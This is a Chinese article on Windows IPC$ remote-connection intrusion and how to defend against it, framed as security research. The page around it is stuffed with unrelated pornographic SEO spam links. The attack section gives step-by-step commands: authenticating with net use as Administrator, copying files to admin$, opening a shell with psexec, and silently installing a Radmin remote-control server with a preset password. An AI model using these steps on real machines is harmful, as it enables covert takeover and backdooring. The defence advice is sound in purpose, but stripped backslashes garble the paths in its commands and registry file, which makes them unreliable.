国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

IPC安全防范研究
2006-01-10   網絡

  網絡安全遵循木桶原理,即整個網絡環境中網絡安全的水平是由該網絡中防護水平最弱的計算機所決定的。在單位內部網絡中,大部分安全都是建立在基于“信任”的基礎上,而沒有采取安全防范方法,認為沒有誰會進行破壞,沒有誰會獲取情報信息。在這種環境下,遠程網絡連接安全是一個不容忽視的安全問題,值得進行探討。

什么是IPC
  IPC是Internet Process Connection的縮寫,也就是遠程網絡連接。它是Windows NT及Windows 2000特有的一項功能。IPC是Windows的一個重要模塊,網上鄰居以及網絡共享都是通過IPC來實現的。黑客或者入侵者利用IPC$共享來實現入侵。網絡上也常常將利用IPC$來實現入侵,稱為IPC$漏洞。IPC$連接分為IPC$空連接和帶有一定權限IPC$連接,IPC$空連接沒有任何權限,但是可以獲取該主機的netbios信息;而帶有權限的IPC$連接則可以執行命令和對文件進行復制、刪除和修改等操作,從安全的角度來說,IPC$是一個存在安全隱患的因素。

IPC$入侵原理
  IPC$入侵的最主要原理就是獲取被入侵主機的密碼,利用有權限的IPC$連接到主機并復制文件到主機上,然后運行木馬程序或者執行命令來實現完全控制。如果系統默認共享全部打開,通過字典軟件生成用戶口令密碼,再利用某些軟件進行用戶登錄密碼的暴力猜解,獲取用戶密碼只是時間問題。因此網絡遠程連接(IPC)安全是網絡安全中一個不容忽視的問題。

常見IPC漏洞攻擊方法
  1.利用IPC漏洞應具備的條件

  (1)知道賬號和口令,且賬號的權限必須是System以上,本系統中使用是Administator權限。在絕大多數環境中,利用軟件所掃描出來的弱口令一般都是管理員(Administrator)權限,如圖1所示。

  (2)系統沒有禁用遠程IPC$連接
  (3)能夠掃描到對方計算機上所開放的445、135或者139端口
  2.試驗
  (1)試驗環境
  ◆ Windows 2000 Professional +SP4虛擬機
  ◆ 系統未安裝殺毒軟件和防火墻
  ◆ 目標機IP地址為192.168.1.4
  ◆ 遠程控制文件R_server.exe、raddrv.dll、AdmDll.dll。除了Radmin以外還有其他的遠程控制軟件也可以使用。
  (2)探測目標機開放端口
  ◆ 使用sfind工具。使用命令格式為sfind -p 192.168.1.4
  ◆ 使用NT自動攻擊工具
  (3)獲取目標機管理員賬號和密碼
  (4)執行命令
net use \192.168.1.4ipc$ "123456" /user:"Administrator"
copy *.*
\192.168.1. 4admin$ 其中*.*包含所有的控制文件。
psexec
\192.168.1.4 cmd
  通過命令行方式安裝R_Server。直接在psexec中執行以下命令:
netstat -an |find "4899"
regsrc.exe/pass:lovemeloveyou/port:4899/save/silence
regsrc.exe /install /silence
net start r_server
netstat -an |find "4899"
  執行結果表示Radmin遠程控制軟件服務端安裝成功,然后通過radmin客戶端可以直接對該計算機實施遠程控制。

安全防范方法
  1.管理層次防范方法
  在網絡管理中常流行一句話“三分技術,七分管理”。其實在網絡安全中也是“三分技術,七分管理”,安全重在管理。只有意識上的重視才能帶來長久的安全。
  (1)安全審計
  密碼的安全是整個網絡安全中的一個重要因素,因此應從審計的角度加強管理,可以對系統是否安裝殺毒軟件、防火墻軟件、安裝系統補丁、系統設置密碼等方面進行安全審計,并配置一個安全管理人員。
  (2)安全知識培訓
  網絡安全也是一門技術,它由很多知識構成。因此了解和實施需要一個過程,這個過程就是培訓和教育。通過培訓來提高安全意識和安全技能,通過知識和法律教育來普及計算安全知識和計算機犯罪方面的法律意識和責任,增強安全感和責任感。
  2.技術層次防范方法
  (1)查看網絡連接情況
  使用“netstat -an”查看本機與網絡的連接情況。該命令可以查看目前所建立的連接,系統所開放的服務端口。
  (2)查看IPC$連接情況
  使用“net use”命令查看網絡共享連接情況,如果顯示結果是“清單是空的”則表示無IPC$連接。否則會顯示連接的的詳細信息。
  (3)安裝防火墻軟件
  (4)關閉掉缺省共享
  關閉缺省共享有兩種方式,一種是徹底的禁用共享,一種是開機后刪除共享。
  開機后刪除共享,可以將如下代碼復制到記事本,然后將其另存為delshare.bat文件,并將其添加到系統的啟動中,這樣系統啟動后就會自動刪除默認共享。
net share admin$ /del
net share ipc$ /del
net share c /del
net share d /del
net share e /del
  徹底刪除共享,可以直接將以下代碼復制到文本文件,并保存為delshare.reg文件,然后自己雙擊該文件將其導入注冊表即可。
REGEDIT4
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices lanmanserverparameters]
"AutoShareServer"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesTcpip Parameters]
"DefaultTTL"= 0-0xff
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesl anmanserverparameters]
"AutoshareWks"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetControlLsa]
  (5)禁止Schedule服務
  直接在“開始”-“運行”中輸入“services.msc”,在服務控制面板中停止掉
本文通過對IPC$入侵方法的分析和研究,提出了技術層次和管理層次的防范。通過以上的分析,可以看出IPC的安全是一個不容忽視的安全問題,因此進行網絡遠程連接的安全防范是非常必須的。

熱詞搜索:

上一篇:L-Blog的三個漏洞
下一篇:Squid安全策略

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
91久久精品国产91久久性色tv| 欧美日韩高清一区| 欧美一区三区三区高中清蜜桃| 欧美日本不卡| 亚洲少妇最新在线视频| 国产精品久久久久一区二区三区共| 亚洲一区二区成人在线观看| 国产人成一区二区三区影院| 久久久久久午夜| 亚洲免费不卡| 国产精品视频网| 欧美成人dvd在线视频| 亚洲天堂av综合网| 好看不卡的中文字幕| 免费日韩av| 亚洲淫片在线视频| 亚洲国产一区在线| 国产日本欧美一区二区| 欧美韩日一区| 久久久久久综合| 亚洲一区视频| 亚洲人成77777在线观看网| 国产精品久久久久91| 蜜臀av性久久久久蜜臀aⅴ| 亚洲一区综合| 亚洲精品久久久久久久久| 国产伦精品一区二区三区照片91| 免费看的黄色欧美网站| 久久亚洲一区| 亚洲免费电影在线观看| 国产麻豆日韩| 欧美日韩成人一区二区三区| 久久精品一区二区三区不卡牛牛| 一区二区三区av| 亚洲国产综合91精品麻豆| 国产区精品视频| 国产精品扒开腿爽爽爽视频| 欧美国产日产韩国视频| 久久婷婷激情| 久久久久国产一区二区三区| 性欧美1819性猛交| 亚洲理论电影网| 亚洲国产欧美在线人成| 国产一区二区日韩精品| 国产精品久久久久久户外露出| 欧美成人嫩草网站| 美国三级日本三级久久99| 久久国产精品久久w女人spa| 亚洲天堂成人在线观看| 在线性视频日韩欧美| 日韩网站在线观看| 亚洲免费不卡| 一区二区动漫| 一本色道久久综合亚洲精品婷婷| 亚洲黄色天堂| 日韩一区二区精品葵司在线| 亚洲精品乱码久久久久久日本蜜臀 | 久久国产手机看片| 亚洲欧美制服中文字幕| 亚洲淫片在线视频| 一区二区91| 亚洲乱码一区二区| 日韩视频在线一区二区三区| 亚洲国产精品一区在线观看不卡| 国产日韩欧美中文| 影音先锋中文字幕一区| 国产精品一区二区久久精品| 国产精品久久二区二区| 国产精品高潮呻吟久久| 欧美日韩综合视频| 国产精品捆绑调教| 国产精品久久久爽爽爽麻豆色哟哟| 欧美日韩ab| 欧美吻胸吃奶大尺度电影| 国产噜噜噜噜噜久久久久久久久| 国产精品美女久久久久久久| 国内揄拍国内精品久久| 国产视频一区二区在线观看| 黄色精品一区二区| 国产一区二区三区久久久久久久久| 国产一区二区三区免费在线观看| 国产综合欧美| 亚洲区免费影片| 亚洲一区三区在线观看| 久久久久久综合网天天| 欧美精品成人91久久久久久久| 国产精品国产a级| 国模一区二区三区| 亚洲激情女人| 99re热精品| 久久精品国产77777蜜臀| 久久深夜福利免费观看| 欧美日韩国产区一| 国产精品久久久久av免费| 国产午夜精品久久| 精品51国产黑色丝袜高跟鞋| 亚洲精品综合在线| 欧美在线观看视频| 欧美精品精品一区| 国产午夜精品一区二区三区欧美 | 久久亚洲捆绑美女| 欧美成人xxx| 国产综合色一区二区三区| 亚洲国产欧美日韩| 亚洲永久免费观看| 欧美激情视频一区二区三区在线播放 | 男人的天堂成人在线| 欧美另类高清视频在线| 国产精品视频yy9299一区| 亚洲国产美女久久久久| 亚洲一区3d动漫同人无遮挡| 久久综合久久综合久久| 亚洲精品乱码久久久久久蜜桃麻豆 | 日韩一二在线观看| 久久大综合网| 国产精品国产三级国产aⅴ无密码| 亚洲高清免费| 亚洲欧美欧美一区二区三区| 欧美日韩国产在线| 亚洲精品免费在线播放| 久久久久久亚洲精品杨幂换脸 | 国产欧美在线观看| 一区二区三区成人| 欧美另类99xxxxx| 亚洲看片一区| 欧美精品久久99| 亚洲精品一区二区三| 欧美不卡福利| 91久久久久久| 欧美精品色网| 亚洲黄页一区| 欧美精品国产一区| 99国产精品久久久久久久久久| 欧美大片18| 日韩性生活视频| 欧美啪啪一区| 亚洲一区二区黄| 国产精品永久免费在线| 欧美影片第一页| 国产三级欧美三级| 久久精品在线| 亚洲国内欧美| 欧美亚男人的天堂| 亚洲欧美综合精品久久成人| 国产女主播视频一区二区| 久久都是精品| 亚洲大片免费看| 欧美韩国日本综合| 一区二区三区www| 国产视频观看一区| 久久夜色精品国产欧美乱极品| 亚洲福利专区| 欧美视频在线观看免费| 亚洲欧美综合网| 精品福利电影| 欧美日韩99| 久久黄色影院| 亚洲欧洲日产国产综合网| 欧美日韩精品一区二区在线播放 | 亚洲国产精品一区在线观看不卡| 久久一区二区视频| 亚洲高清免费视频| 欧美午夜精品| 久久精品视频在线免费观看| 136国产福利精品导航网址应用 | 国内精品久久久久影院 日本资源 国内精品久久久久伊人av | 久久人人爽人人爽爽久久| 在线精品一区| 欧美日韩精品在线观看| 欧美亚洲视频一区二区| 亚洲人午夜精品免费| 国产精品久久久久久久久久妞妞| 久久久国产视频91| 在线一区二区三区四区| 永久域名在线精品| 国产精品电影网站| 牛牛影视久久网| 午夜日韩激情| 日韩视频精品| 韩国精品在线观看| 国产精品99一区二区| 美女露胸一区二区三区| 午夜久久久久| 亚洲免费观看高清在线观看 | 欧美丰满高潮xxxx喷水动漫| 亚洲一区二区三区精品视频 | 欧美专区在线观看一区| 亚洲精品一二| 在线观看欧美黄色| 国产精品一区二区三区久久久| 欧美激情一区二区三区高清视频 | 最新日韩在线视频| 国产视频精品xxxx| 国产精品久久久久aaaa九色| 欧美日韩成人综合| 欧美大片免费观看| 久久久夜精品| 久久精品视频播放| 欧美在线影院| 欧美一级片在线播放|